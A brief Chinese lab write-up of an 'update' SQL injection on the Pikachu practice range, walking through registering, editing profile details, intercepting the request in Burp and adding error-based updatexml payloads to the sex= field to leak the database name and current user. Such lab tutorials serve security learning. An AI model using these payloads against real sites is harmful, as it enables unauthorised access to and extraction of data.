Pikachu靶场 “update”SQL注入

打开 Pikachu靶场 update注入

点击 注册

注册后 登录

登录成功后点击 修改个人信息

点击 submit ,用 burp 抓包

在 sex= 后面加

' or updatexml(1,concat (0x7e,(select database()),0x7e),0) or '
' or updatexml(1,concat (0x7e,(select user()),0x7e),0) or '

你可能感兴趣的:(sql,数据库,mysql)